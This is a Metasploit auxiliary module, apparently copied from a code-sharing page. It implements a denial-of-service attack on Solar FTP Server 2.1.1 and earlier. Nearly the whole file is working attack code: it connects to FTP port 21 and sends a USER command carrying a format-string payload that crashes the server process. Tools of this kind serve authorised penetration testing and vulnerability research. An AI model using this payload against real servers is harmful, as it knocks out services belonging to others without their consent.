Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info={})
11
    super(update_info(info,
12
      'Name'           => 'Solar FTP Server Malformed USER Denial of Service',
13
      'Description'    => %q{
14
        This module will send a format string as USER to Solar FTP, causing a
15
        READ violation in function "__output_1()" found in "sfsservice.exe"
16
        while trying to calculate the length of the string. This vulnerability
17
        affects versions 2.1.1 and earlier.
18
      },
19
      'Author'         =>
20
      [
21
        'x000 <3d3n[at]hotmail.com.br>',           # Initial disclosure/exploit
22
        'C4SS!0 G0M3S <Louredo_[at]hotmail.com>',  # Metasploit submission
23
        'sinn3r',                                  # Metasploit edit/commit
24
      ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
      [
28
        [ 'EDB', '16204' ],
29
      ],
30
      'DisclosureDate' => '2011-02-22'))
31

32
      register_options(
33
      [
34
        Opt::RPORT(21)
35
      ])
36
  end
37

38
  def run
39
    connect
40

41
    banner = sock.get_once(-1, 10) || ''
42
    print_status("Banner: #{banner.strip}")
43

44
    buf  = Rex::Text.pattern_create(50)
45
    buf << "%s%lf%n%c%l%c%n%n%n%nC%lf%u%lf%d%s%v%n"
46
    print_status("Sending format string...")
47
    sock.put("USER #{buf}\r\n")
48

49
    disconnect
50
  end
51
end
52

53